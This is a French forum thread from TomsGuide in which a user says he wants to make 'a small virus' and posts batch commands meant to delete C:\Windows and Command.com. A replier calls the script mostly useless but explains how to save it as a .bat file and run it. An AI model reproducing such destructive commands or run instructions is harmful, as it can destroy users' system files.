création de fichiers problèmes
Forum Programmation : création de fichiers problèmes
TomsGuide.com : 800 000 inscrits répondent à toutes vos questions high-tech et informatique.
Pour obtenir de l'aide, inscrivez-vous gratuitement !
bonjour je voudrai savoir comment créer un fichier txt. avec quel logiciel et comment taper dans le fichier des commandes?
| Citation : comment créer un fichier txt. |
Clique droit >> nouveau >> document texte
| Citation : comment taper dans le fichier des commandes? |
Tu veux rire ? c'est une blague ? c'est pas drole tu sais. Sérieusement, des commandes ? quel langage ?
je veux dire comment taper, dans le fichier txt, des commandes:
DEL CHEMIN
DELTREE CHEMIN
MOVE CHEMIN
COPY CHEMIN DESTINATION
aider moi svp
tu prends ton clavier et tu écris !!!
xD
Non serieusement un fichier txt ( TEXTE ) tu écris ce que tu veux dedans
ce sont quoi comme cmd? ton fichier de sera plus un txt !
Ce que tu veux faire c'est du bath. Recherche sur google ce que c'est est comment l'utiliser.
non je veux faire un petit virus
en fait j'ai lu sa dans un post:
voici les instructions a suivre
d'abord il faut crée un fichier txt. ensuite tu y va dessus et tu tappes les instructions suivante
DEL CHEMIN c:\Command.com
DELTREE CHEMIN C:\Windows
MOVE CHEMIN C:\Windows\systeme32
COPY CHEMIN DESTINATION C:\Windows
et des que ta fini de copier ceci tu enrengistre sous n'importe quelle dossiers (mes documents)etc... renome le fichiers .txt en .bat par exemple tu peux choisir le nom Virus.bat
-_- , la gars qui va lancer le batch.
si tu sais pourquoi tu demande ?
| Citation : non je veux faire un petit virus |
Pour faire un virus il te faut un autre language de programmation tels que c/c++/python/..... . De plus normalement je n'ai pas le droite de t'expliquer comment faire un virus
. Comme ce que tu veux faire n'est un virus mais un script qui ne sert à rien du tout je vais t'aider. Tu crées un document texte avec notepad/blocnote tu y colle cca:
| Citation : DEL c:\Command.com
|
puis tu fait enregistrer sous >> type: tout les fichiers >> nom: cequetuveux.bat. Ensuite éxécute le bat et tu verras que :
- Command.com n'existe pas
- Windows ne peux pas être supprimer sous xp/vista et que win 98 demandes une validation
- Le reste ne sert à rien ^^
tu m'as dis de faire
DEL c:\Command.com
DELTREE C:\Windows
MOVE C:\Windows\systeme32
COPY C:\Windows
dans un bloc note j'enregistre ce que je veux .bat ou .bat. et apres comment l'executer
en .bat puis double clic
Et surtous ne soit pas dessus du résultat parceque faire ca avec du bath ....^_^
...
Il y a 530 utilisateurs connus et inconnus. Pour voir la liste des connectés connus, cliquez ici.